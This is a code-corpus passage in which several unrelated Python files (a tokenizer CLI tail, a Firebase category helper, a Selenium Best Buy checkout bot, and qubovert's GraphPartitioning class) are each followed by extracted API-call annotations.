            perror("%s:%d:%d: error: %s" % ((filename,) + location + (message,)))
        elif filename:
            perror("%s: error: %s" % (filename, message))
        else:
            perror("error: %s" % message)
        sys.exit(1)

    # Parse the arguments and options
    parser = argparse.ArgumentParser(prog="python -m tokenize")
    parser.add_argument(
        dest="filename",
        nargs="?",
        metavar="filename.py",
        help="the file to tokenize; defaults to stdin",
    )
    parser.add_argument(
        "-e",
        "--exact",
        dest="exact",
        action="store_true",
        help="display token names using the exact type",
    )
    args = parser.parse_args()

    try:
        # Tokenize the input
        if args.filename:
            filename = args.filename
            with open(filename, "r") as f:
                tokens = list(character_generator(f))
        else:
            filename = "<stdin>"
            tokens = character_generator(sys.stdin, None)
        # Output the tokenization
        for tok in tokens:
            token_type = tok.exact_type if args.exact else tok.type
            token_range = "%d,%d-%d,%d:" % (tok.start + tok.end)
            print("%-20s%-15s%-15r" % (token_range, tok_name[token_type], tok.string))
    except SyntaxError as err:
        error(err, filename)
    except OSError as err:
        error(err)
    except KeyboardInterrupt:
        print("interrupted\n")
    except Exception as err:
        perror("unexpected error: %s" % err)
        raise


if __name__ == "__main__":
    main()
| [
"argparse.ArgumentParser",
"re.compile",
"tokenize.TokenInfo",
"tokenize.generate_tokens",
"sys.stderr.write",
"sys.exit",
"io.StringIO"
] | [((191, 214), 're.compile', 're.compile', (['"""[A-Za-z_]"""'], {}), "('[A-Za-z_]')\n", (201, 214), False, 'import re\n'), ((231, 253), 're.compile', 're.compile', (['"""[ \t\n]+"""'], {}), "('[ \\t\\n]+')\n", (241, 253), False, 'import re\n'), ((263, 290), 're.compile', 're.compile', (['"""[A-Za-z_]\\\\w*"""'], {}), "('[A-Za-z_]\\\\w*')\n", (273, 290), False, 'import re\n'), ((307, 344), 're.compile', 're.compile', (['"""""\\"|"|\\\\\'\\\\\'\\\\\'|\\\\\'"""'], {}), '(\'"""|"|\\\\\\\'\\\\\\\'\\\\\\\'|\\\\\\\'\')\n', (317, 344), False, 'import re\n'), ((529, 551), 'io.StringIO', 'io.StringIO', (['data[:-1]'], {}), '(data[:-1])\n', (540, 551), False, 'import io\n'), ((9937, 10008), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.ENDMARKER', 'string': '""""""', 'start': 'pos', 'end': 'pos', 'line': '""""""'}), "(type=token.ENDMARKER, string='', start=pos, end=pos, line='')\n", (9946, 10008), False, 'from tokenize import TokenInfo\n'), ((13892, 13942), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""python -m tokenize"""'}), "(prog='python -m tokenize')\n", (13915, 13942), False, 'import argparse\n'), ((568, 604), 'tokenize.generate_tokens', 'tokenize.generate_tokens', (['s.readline'], {}), '(s.readline)\n', (592, 604), False, 'import tokenize\n'), ((5530, 5628), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NEWLINE', 'string': '"""\n"""', 'start': '(line_no, pos)', 'end': '(line_no, pos)', 'line': '""""""'}), "(type=token.NEWLINE, string='\\n', start=(line_no, pos), end=(\n line_no, pos), line='')\n", (5539, 5628), False, 'from tokenize import TokenInfo\n'), ((5681, 5787), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.ENDMARKER', 'string': '""""""', 'start': '(line_no, pos + 1)', 'end': '(line_no, pos + 1)', 'line': '""""""'}), "(type=token.ENDMARKER, string='', start=(line_no, pos + 1), end=(\n line_no, pos + 1), line='')\n", (5690, 5787), False, 'from tokenize import TokenInfo\n'), ((13446, 13471), 
'sys.stderr.write', 'sys.stderr.write', (['message'], {}), '(message)\n', (13462, 13471), False, 'import sys\n'), ((13480, 13502), 'sys.stderr.write', 'sys.stderr.write', (['"""\n"""'], {}), "('\\n')\n", (13496, 13502), False, 'import sys\n'), ((13828, 13839), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (13836, 13839), False, 'import sys\n'), ((11135, 11229), 'tokenize.TokenInfo', 'tokenize.TokenInfo', (['token.NEWLINE', 'tok.string'], {'start': 'tok.start', 'end': 'tok.end', 'line': 'tok.line'}), '(token.NEWLINE, tok.string, start=tok.start, end=tok.end,\n line=tok.line)\n', (11153, 11229), False, 'import tokenize\n'), ((12053, 12147), 'tokenize.TokenInfo', 'tokenize.TokenInfo', (['token.NEWLINE', 'tok.string'], {'start': 'tok.start', 'end': 'tok.end', 'line': 'tok.line'}), '(token.NEWLINE, tok.string, start=tok.start, end=tok.end,\n line=tok.line)\n', (12071, 12147), False, 'import tokenize\n'), ((3132, 3236), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NEWLINE', 'string': '"""\n"""', 'start': '(line_no, pos - 1)', 'end': '(line_no, pos)', 'line': 'line'}), "(type=token.NEWLINE, string='\\n', start=(line_no, pos - 1), end=(\n line_no, pos), line=line)\n", (3141, 3236), False, 'from tokenize import TokenInfo\n'), ((3572, 3608), 're.compile', 're.compile', (['end_pattern', '(re.M | re.S)'], {}), '(end_pattern, re.M | re.S)\n', (3582, 3608), False, 'import re\n'), ((7814, 7918), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NEWLINE', 'string': '"""\n"""', 'start': '(line_no, pos - 1)', 'end': '(line_no, pos)', 'line': 'line'}), "(type=token.NEWLINE, string='\\n', start=(line_no, pos - 1), end=(\n line_no, pos), line=line)\n", (7823, 7918), False, 'from tokenize import TokenInfo\n'), ((4886, 4990), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NUMBER', 'string': 'data[pos]', 'start': '(line_no, pos)', 'end': '(line_no, pos)', 'line': 'line'}), '(type=token.NUMBER, string=data[pos], start=(line_no, pos), end=(\n line_no, pos), 
line=line)\n', (4895, 4990), False, 'from tokenize import TokenInfo\n'), ((5200, 5304), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.OP', 'string': 'data[pos]', 'start': '(line_no, pos)', 'end': '(line_no, pos + 1)', 'line': 'line'}), '(type=token.OP, string=data[pos], start=(line_no, pos), end=(\n line_no, pos + 1), line=line)\n', (5209, 5304), False, 'from tokenize import TokenInfo\n'), ((9006, 9042), 're.compile', 're.compile', (['end_pattern', '(re.M | re.S)'], {}), '(end_pattern, re.M | re.S)\n', (9016, 9042), False, 'import re\n'), ((9606, 9710), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.OP', 'string': 'data[pos]', 'start': '(line_no, pos)', 'end': '(line_no, pos + 1)', 'line': 'line'}), '(type=token.OP, string=data[pos], start=(line_no, pos), end=(\n line_no, pos + 1), line=line)\n', (9615, 9710), False, 'from tokenize import TokenInfo\n')] |
from firebase import firebase
from firebase_admin import db
from prettytable import PrettyTable
class Category:
    """Thin wrapper around the Firebase `Category` collection."""

    def __init__(self, category_name=None):
        self.category_name = category_name

    def add_category(self, category_name=None):
        """Push a new category record; return the generated Firebase key."""
        payload = {
            'category_name': category_name,
        }
        pushed = db.reference('Category').push(payload)
        return pushed.key

    @staticmethod
    def remove_category(id):
        """Delete the category stored under the given Firebase key."""
        db.reference("Category/{}".format(id)).delete()

    @staticmethod
    def get_all_categories():
        """Print every category as a table; return True if any exist."""
        categories = db.reference("Category").get()
        print("All Categories:")
        table = PrettyTable(["S.no", "Category"])
        if not categories:
            table.add_row([0, "No Category !!"])
            print(table)
            return False
        for row_no, values in enumerate(categories.values(), start=1):
            table.add_row([row_no, values['category_name']])
        print(table)
        return True

    @staticmethod
    def get_category_by_id(id):
        """Fetch a single category record by its Firebase key."""
        return db.reference("Category/{}".format(id)).get()
| [
"prettytable.PrettyTable",
"firebase_admin.db.reference"
] | [((675, 708), 'prettytable.PrettyTable', 'PrettyTable', (["['S.no', 'Category']"], {}), "(['S.no', 'Category'])\n", (686, 708), False, 'from prettytable import PrettyTable\n'), ((342, 366), 'firebase_admin.db.reference', 'db.reference', (['"""Category"""'], {}), "('Category')\n", (354, 366), False, 'from firebase_admin import db\n'), ((579, 603), 'firebase_admin.db.reference', 'db.reference', (['"""Category"""'], {}), "('Category')\n", (591, 603), False, 'from firebase_admin import db\n')] |
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.support import expected_conditions as ec
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium import webdriver
from time import sleep
import account
def start():
    """Automate a Best Buy GPU purchase with Selenium/Firefox.

    Flow: log in, poll the product page until the Add-to-Cart button is
    enabled, add to cart, select store pickup, fill billing/payment details
    (read from ``account.check_files_2()``) and place the order.

    NOTE(review): uses the legacy ``find_element_by_*`` driver API —
    presumably written against Selenium 3; confirm before upgrading.
    """
    options = Options()
    options.headless = False  # run with a visible browser window
    fp = FirefoxProfile()
    fp.set_preference('geo.enabled', False)  # disable geolocation prompts
    driver = webdriver.Firefox(firefox_profile=fp, options=options)
    wait = WebDriverWait(driver, 20)  # default explicit-wait timeout (seconds)

    def word_entry(element, word):
        # Type *word* one character at a time (more human-like than send_keys of the whole string).
        for char in word:
            element.send_keys(char)

    # checks if survey pops up
    def survey():
        print("Survey")
        checking_survey = True
        while checking_survey:
            try:
                driver.find_element_by_id('survey_invite_no').click()
                checking_survey = False
                print(" Declined")
                sleep(1)
            except NoSuchElementException:
                print(" No Survey")
                checking_survey = False

    # checks if spinner is invisible to continue to check out
    def spinner_check():
        try:
            WebDriverWait(driver, 4).until(ec.invisibility_of_element_located
                                           ((By.CLASS_NAME, "page-spinner")))
            print("Gone")
        except:
            # Best-effort: the spinner may simply never have appeared.
            print("Spinner Not There")
            pass
    print('Loading...')
    # Item of choice
    driver.get('https://www.bestbuy.com/site/evga-nvidia-geforce-rtx-3060'
               '-xc-gaming-12gb-gddr6-pci-express-4-0-graphics-card/6454329.p?skuId=6454329')
    # driver.get('https://www.bestbuy.com/site/nvidia-geforce-rtx-3080'
    #            '-10gb-gddr6x-pci-express-4-0-graphics-card-titanium-and'
    #            '-black/6429440.p?skuId=6429440')
    sleep(5)
    survey()
    # Account button drop down
    wait.until(ec.element_to_be_clickable((By.CSS_SELECTOR, '.account-button')))
    driver.find_element_by_css_selector('.account-button').click()
    print("***Found Account Button***")
    # Sign in button from drop down
    wait.until(ec.presence_of_element_located((By.CSS_SELECTOR, '.sign-in-btn')))
    driver.find_element_by_css_selector('.sign-in-btn').click()
    print("***Found Sign-In Button***")
    #
    # ENTER EMAIL (credentials come from the local `account` module)
    wait.until(ec.presence_of_element_located((By.ID, "fld-e")))
    email_address_el = driver.find_element_by_id("fld-e")
    word_entry(email_address_el, account.check_files_2()['Login Email'])
    print("***Entered Email***")
    #
    # ENTER PASSWORD
    wait.until(ec.presence_of_element_located((By.ID, "fld-p1")))
    email_password_el = driver.find_element_by_id("fld-p1")
    word_entry(email_password_el, account.check_files_2()['Login Pass'])
    print("***Entered Password***")
    #
    survey()
    # SUBMIT
    wait.until(ec.element_to_be_clickable((By.CSS_SELECTOR, '.c-button-secondary')))
    driver.find_element_by_css_selector('.c-button-secondary').click()
    print("***Logged In***")
    #
    survey()
    # CHECKING ADD TO CART — poll until the disabled button disappears.
    i = 0
    sleep(5)
    buy_button = True
    while buy_button:
        sleep(0.5)
        print(' Checking {}'.format(i))
        survey()
        try:
            # While the "disabled" button exists the item is sold out.
            driver.find_element_by_class_name(".c-button-disabled")
            print('Sold Out')
            i += 1
            if i % 100 == 0:
                # Periodically reload the page so the button state updates.
                driver.refresh()
                print('Refreshed')
                if i == 1000:
                    i = 0
        except:
            # Disabled button gone: the enabled Add-to-Cart button should be present.
            add_button = driver.find_element_by_class_name(".c-button-primary")
            sleep(0.8)
            add_button.click()
            buy_button = False
            spinner_check()
            print("***Found add to cart***")
    print('Checking for second button...Waiting Up to 25min ')
    WebDriverWait(driver, 1500).until(ec.element_to_be_clickable((By.CLASS_NAME, ".c-button-primary")))
    driver.find_element_by_class_name('btn-primary').click()
    print('Clicked second Add To Cart')
    sleep(1)
    driver.get("https://www.bestbuy.com/cart")
    print("***Loading Cart***")
    # Selects store pickup
    spinner_check()
    wait.until(ec.element_to_be_clickable((By.XPATH,
                                           '/html/body/div[1]/main/div/div[2]/div[1]/'
                                           'div/div[1]/div[1]/section[1]/div[4]/ul/li/'
                                           'section/div[2]/div[2]/form/div[2]/fieldset/'
                                           'div[1]/div[1]/div/div/div/input')))
    driver.find_element_by_xpath('/html/body/div[1]/main/div/div[2]/div[1]/div/div[1]'
                                 '/div[1]/section[1]/div[4]/ul/li/section/div[2]/div[2]'
                                 '/form/div[2]/fieldset/div[1]/div[1]/div/div/div/input').click()
    wait.until(ec.element_to_be_clickable((By.CLASS_NAME, ".c-button-primary")))
    driver.find_element_by_xpath("/html/body").click()
    ship = driver.find_element_by_class_name(".c-button-primary")
    # Scroll the checkout button into view before clicking it.
    driver.execute_script("arguments[0].scrollIntoView(true);", ship)
    ship.click()
    print("***Checkout Button Hit***")
    # INFORMATION FOR SHOPPING CART
    wait.until(ec.element_to_be_clickable((By.XPATH,
                                           '/html/body/div[1]/div[2]/div/'
                                           'div[2]/div[1]/div[1]/main/div[2]'
                                           '/div[2]/form/section/div/div[2]/'
                                           'div/div/button')))
    driver.find_element_by_xpath('/html/body/div[1]/div[2]/div/div[2]'
                                 '/div[1]/div[1]/main/div[2]/div[2]/form/section/'
                                 'div/div[2]/div/div/button').click()
    sleep(0.5)
    # CARD NUMBER
    wait.until(ec.presence_of_element_located((By.ID, 'optimized-cc-card-number')))
    card = driver.find_element_by_id('optimized-cc-card-number')
    word_entry(card, account.check_files_2()['Card Number'])
    # ADDRESS
    wait.until(ec.presence_of_element_located((By.ID, 'payment.billingAddress.street')))
    address = driver.find_element_by_id('payment.billingAddress.street')
    word_entry(address, account.check_files_2()['Address'])
    print("**Added Street Address**")
    # FIRST NAME
    first_name = driver.find_element_by_id('payment.billingAddress.firstName')
    word_entry(first_name, account.check_files_2()['First Name'])
    print("**Added First Name**")
    # LAST NAME
    last_name = driver.find_element_by_id('payment.billingAddress.lastName')
    word_entry(last_name, account.check_files_2()['Last Name'])
    print("**Added Last Name**")
    # CITY
    city = driver.find_element_by_id('payment.billingAddress.city')
    word_entry(city, account.check_files_2()['City'])
    print("**Added City**")
    # ZIP CODE
    city_zip_code = driver.find_element_by_id('payment.billingAddress.zipcode')
    word_entry(city_zip_code, account.check_files_2()['ZipCode'])
    print("**Added ZipCode**")
    # SELECT STATE ('CC' is typed into the state dropdown — TODO confirm intended state code)
    driver.find_element_by_id('payment.billingAddress.state').send_keys('CC')
    print("**Selected State**")
    # BUTTON TO CONTINUE
    security = driver.find_element_by_id('credit-card-cvv')
    word_entry(security, account.check_files_2()['Card CVV 3 Digits'])
    month = Select(driver.find_element_by_xpath("/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]"
                                                "/main/div[2]/div[3]/div/section/div[1]/div/section"
                                                "/div[2]/div[1]/div/div[1]/label/div/div/select"))
    month.select_by_value(account.check_files_2()['Card Expire Month'])
    year = Select(driver.find_element_by_xpath("/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]"
                                               "/main/div[2]/div[3]/div/section/div[1]/div/section"
                                               "/div[2]/div[1]/div/div[2]/label/div/div/select"))
    year.select_by_value(account.check_files_2()['Card Expire Year'])
    place_order = driver.find_element_by_xpath('/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]'
                                               '/main/div[2]/div[3]/div/section/div[4]/button')
    place_order.click()
    print('Purchase Completed! Thank you for using this code!')
| [
"selenium.webdriver.firefox.firefox_profile.FirefoxProfile",
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.support.expected_conditions.invisibility_of_element_located",
"account.check_files_2",
"selenium.webdriver.Firefox",
"time.sleep",
"selenium.webdriver.firefox.options.Options",... | [((514, 523), 'selenium.webdriver.firefox.options.Options', 'Options', ([], {}), '()\n', (521, 523), False, 'from selenium.webdriver.firefox.options import Options\n'), ((564, 580), 'selenium.webdriver.firefox.firefox_profile.FirefoxProfile', 'FirefoxProfile', ([], {}), '()\n', (578, 580), False, 'from selenium.webdriver.firefox.firefox_profile import FirefoxProfile\n'), ((640, 694), 'selenium.webdriver.Firefox', 'webdriver.Firefox', ([], {'firefox_profile': 'fp', 'options': 'options'}), '(firefox_profile=fp, options=options)\n', (657, 694), False, 'from selenium import webdriver\n'), ((707, 732), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(20)'], {}), '(driver, 20)\n', (720, 732), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((2090, 2098), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (2095, 2098), False, 'from time import sleep\n'), ((3389, 3397), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (3394, 3397), False, 'from time import sleep\n'), ((4334, 4342), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (4339, 4342), False, 'from time import sleep\n'), ((6115, 6125), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (6120, 6125), False, 'from time import sleep\n'), ((2163, 2227), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CSS_SELECTOR, '.account-button')"], {}), "((By.CSS_SELECTOR, '.account-button'))\n", (2189, 2227), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2393, 2458), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.CSS_SELECTOR, '.sign-in-btn')"], {}), "((By.CSS_SELECTOR, '.sign-in-btn'))\n", (2423, 2458), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2610, 2658), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 
'ec.presence_of_element_located', (["(By.ID, 'fld-e')"], {}), "((By.ID, 'fld-e'))\n", (2640, 2658), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2874, 2923), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'fld-p1')"], {}), "((By.ID, 'fld-p1'))\n", (2904, 2923), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((3150, 3218), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CSS_SELECTOR, '.c-button-secondary')"], {}), "((By.CSS_SELECTOR, '.c-button-secondary'))\n", (3176, 3218), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((3453, 3463), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (3458, 3463), False, 'from time import sleep\n'), ((4160, 4224), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CLASS_NAME, '.c-button-primary')"], {}), "((By.CLASS_NAME, '.c-button-primary'))\n", (4186, 4224), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((4489, 4697), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.XPATH,\n '/html/body/div[1]/main/div/div[2]/div[1]/div/div[1]/div[1]/section[1]/div[4]/ul/li/section/div[2]/div[2]/form/div[2]/fieldset/div[1]/div[1]/div/div/div/input'\n )"], {}), "((By.XPATH,\n '/html/body/div[1]/main/div/div[2]/div[1]/div/div[1]/div[1]/section[1]/div[4]/ul/li/section/div[2]/div[2]/form/div[2]/fieldset/div[1]/div[1]/div/div/div/input'\n ))\n", (4515, 4697), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((5172, 5236), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CLASS_NAME, '.c-button-primary')"], {}), "((By.CLASS_NAME, '.c-button-primary'))\n", (5198, 5236), True, 'from 
selenium.webdriver.support import expected_conditions as ec\n'), ((5545, 5703), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.XPATH,\n '/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]/main/div[2]/div[2]/form/section/div/div[2]/div/div/button'\n )"], {}), "((By.XPATH,\n '/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]/main/div[2]/div[2]/form/section/div/div[2]/div/div/button'\n ))\n", (5571, 5703), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((6142, 6209), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'optimized-cc-card-number')"], {}), "((By.ID, 'optimized-cc-card-number'))\n", (6172, 6209), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((6372, 6444), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'payment.billingAddress.street')"], {}), "((By.ID, 'payment.billingAddress.street'))\n", (6402, 6444), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2753, 2776), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (2774, 2776), False, 'import account\n'), ((3021, 3044), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (3042, 3044), False, 'import account\n'), ((4126, 4153), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(1500)'], {}), '(driver, 1500)\n', (4139, 4153), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((6299, 6322), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6320, 6322), False, 'import account\n'), ((6545, 6568), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6566, 6568), False, 'import account\n'), ((6748, 6771), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6769, 6771), False, 'import 
account\n'), ((6946, 6969), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6967, 6969), False, 'import account\n'), ((7123, 7146), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (7144, 7146), False, 'import account\n'), ((7315, 7338), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (7336, 7338), False, 'import account\n'), ((7632, 7655), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (7653, 7655), False, 'import account\n'), ((8008, 8031), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (8029, 8031), False, 'import account\n'), ((8382, 8405), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (8403, 8405), False, 'import account\n'), ((1162, 1170), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (1167, 1170), False, 'from time import sleep\n'), ((1444, 1511), 'selenium.webdriver.support.expected_conditions.invisibility_of_element_located', 'ec.invisibility_of_element_located', (["(By.CLASS_NAME, 'page-spinner')"], {}), "((By.CLASS_NAME, 'page-spinner'))\n", (1478, 1511), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((3921, 3931), 'time.sleep', 'sleep', (['(0.8)'], {}), '(0.8)\n', (3926, 3931), False, 'from time import sleep\n'), ((1413, 1437), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(4)'], {}), '(driver, 4)\n', (1426, 1437), False, 'from selenium.webdriver.support.ui import WebDriverWait\n')] |
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""_graph_partitioning.py.
Contains the GraphPartitioning class.
See ``help(qubovert.problems.GraphPartitioning)``.
"""
from qubovert.utils import QUSOMatrix
from qubovert import PCSO
from qubovert.problems import Problem
__all__ = 'GraphPartitioning',
class GraphPartitioning(Problem):
"""GraphPartitioning.
Class to manage converting (Weighted) Graph Partitioning to and from its
QUBO and QUSO formluations. Based on the paper "Ising formulations of many
NP problems", hereforth designated [Lucas].
The goal of the Graph Partitioning problem is to partition the verticies
of a graph into two equal subsets such that the number of edges (or the
total weight of the edges) connecting the two subsets is minimized.
GraphPartitioning inherits some methods and attributes from the Problem
class. See ``help(qubovert.problems.Problem)``.
Example
-------
>>> from qubovert.problems import GraphPartitioning
>>> from any_module import qubo_solver
>>> # or you can use my bruteforce solver...
>>> # from qubovert.utils import solve_qubo_bruteforce as qubo_solver
>>> edges = {("a", "b"), ("a", "c"), ("c", "d"),
("b", "c"), ("e", "f"), ("d", "e")}
>>> problem = GraphPartitioning(edges)
>>> Q = problem.to_qubo()
>>> obj, sol = qubo_solver(Q)
>>> solution = problem.convert_solution(sol)
>>> print(solution)
({'a', 'b', 'c'}, {'d', 'e', 'f'})
>>> print(problem.is_solution_valid(solution))
True
This is True since the number of vertices in the first partition is equal
to the number of vertices in the second partition.
>>> print(obj)
1
This is 1 because there is 1 edge connecting the partitions.
"""
def __init__(self, edges):
"""__init__.
The goal of the (Weighted) Graph Partitioning problem is to partition
the vertices of a graph into two equal subsets such that the number of
edges (or the total weight of the edges) connecting the two subsets is
minimized. All naming conventions follow the names in the paper
[Lucas].
Parameters
----------
edges : set or dict.
If edges is a set, then it must be a set of two element tuples
describing the edges of the graph. Ie each tuple is a connection
between two vertices. If a tuple has a repeated label (for example,
(2, 2)), it will be ignored.
If edges is a dict then the keys must be
two element tuples and the values are the weights associated with
that edge. If a key has a repeated label (for example, (2, 2)), it
will be ignored.
Examples
--------
>>> edges = {("a", "b"), ("a", "c")}
>>> problem = GraphPartitioning(edges)
>>> edges = {(0, 1), (0, 2)}
>>> problem = GraphPartitioning(edges)
>>> edges = {(0, 1): 2, (1, 2): -1}
>>> problem = GraphPartitioning(edges)
"""
if isinstance(edges, set):
self._edges = {k: 1 for k in edges if k[0] != k[1]}
else:
self._edges = {k: v for k, v in edges.items() if k[0] != k[1]}
self._vertices = {y for x in edges for y in x}
self._vertex_to_index = {x: i for i, x in enumerate(self._vertices)}
self._index_to_vertex = {i: x for x, i in
self._vertex_to_index.items()}
self._N = len(self._vertices)
all_degs = {}
for e in edges:
for q in e:
all_degs[q] = all_degs.setdefault(q, 0) + 1
self._degree = max(all_degs.values()) if all_degs else 0
@property
def E(self):
"""E.
A copy of the set of edges of the graph. Updating the copy will not
update the instance set.
Return
------
E : set of two element tuples.
A copy of the edge set defining the Graph Partitioning problem.
"""
return set(self._edges.keys())
@property
def V(self):
"""V.
A copy of the vertex set of the graph. Updating the copy will not
update the instance set.
Returns
-------
V : set.
A copy of the set of vertices corresponding to the edge set for the
Graph Partitioning problem.
"""
return self._vertices.copy()
@property
def weights(self):
"""weights.
Returns a dictionary mapping the edges of the graph to their associated
weights.
Return
------
weights : dict.
Keys are two element tuples, values are numbers.
"""
return self._edges.copy()
@property
def degree(self):
"""degree.
The maximum degree of the graph.
Returns
-------
deg : int.
A copy of the variable of the maximal degree of the graph.
"""
return self._degree
@property
def num_binary_variables(self):
"""num_binary_variables.
The number of binary variables that the QUBO and QUSO use.
Return
------
num : integer.
The number of variables in the QUBO/QUSO formulation.
"""
return self._N
def to_quso(self, A=None, B=1):
r"""to_quso.
Create and return the graph partitioning problem in QUSO form
following section 2.2 of [Lucas]. A and B are parameters to enforce
constraints.
It is formatted such that the solution to the QUSO formulation is
equal to the the total number of edges connecting the two
partitions (or the total weight if we are solving weighted
partitioning).
Parameters
----------
A: positive float (optional, defaults to None).
A enforces the constraints. If it is None, then A will be chosen
to enforce hard constraints (equation 10 in [Lucas]). Note that
this may not be optimal for a solver, often hard constraints result
in unsmooth energy landscapes that are difficult to minimize. Thus
it may be useful to play around with the magnitude of this value.
B: positive float (optional, defaults to 1).
Constant in front of the objective function to minimize. See
section 2.2 of [Lucas].
Return
------
L : qubovert.utils.QUSOMatrix object.
For most practical purposes, you can use QUSOMatrix in the
same way as an ordinary dictionary. For more information, see
``help(qubovert.utils.QUSOMatrix)``.
Example
-------
>>> problem = GraphPartitioning({(0, 1), (1, 2), (0, 3)})
>>> L = problem.to_quso()
"""
# all naming conventions follow the paper listed in the docstring
if A is None:
A = min(2*self._degree, self._N) * B / 8
L = QUSOMatrix()
# encode H_A (equation 8)
L += PCSO().add_constraint_eq_zero(
{(i,): 1 for i in range(self._N)}, lam=A)
# encode H_B (equation 9)
L += B * sum(self._edges.values()) / 2
for (u, v), w in self._edges.items():
L[(self._vertex_to_index[u],
self._vertex_to_index[v])] -= w * B / 2
return L
# slower because we convert to PCSO and then to QUSOMatrix
# H = PCSO()
# H.set_mapping(self._vertex_to_index)
# # encode H_A (equation 8)
# H.add_constraint_eq_zero({(i,): 1 for i in self._vertices}, lam=A)
# # encode H_B (equation 9)
# H += B * sum(self._edges.values()) / 2
# for e, w in self._edges.items():
# H[e] -= w * B / 2
# return H.to_quso()
def convert_solution(self, solution, spin=False):
"""convert_solution.
Convert the solution to the QUBO or QUSO to the solution to the
Graph Partitioning problem.
Parameters
----------
solution : iterable or dict.
The QUBO or QUSO solution output. The QUBO solution output
is either a list or tuple where indices specify the label of the
variable and the element specifies whether it's 0 or 1 for QUBO
(or 1 or -1 for QUSO), or it can be a dictionary that maps the
label of the variable to is value.
spin : bool (optional, defaults to False).
`spin` indicates whether ``solution`` is the solution to the
boolean {0, 1} formulation of the problem or the spin {1, -1}
formulation of the problem. This parameter usually does not matter,
and it will be ignored if possible. The only time it is used is if
``solution`` contains all 1's. In this case, it is unclear whether
``solution`` came from a spin or boolean formulation of the
problem, and we will figure it out based on the ``spin`` parameter.
Return
------
res: tuple of sets (partition1, partition2).
partition1 : set.
The first partition of verticies.
partition2 : set.
The second partition.
Example
-------
>>> edges = {("a", "b"), ("a", "c"), ("c", "d"),
("b", "c"), ("e", "f"), ("d", "e")}
>>> problem = GraphPartitioning(edges)
>>> Q = problem.to_qubo()
>>> obj, sol = solve_qubo(Q)
>>> print(problem.convert_solution(sol))
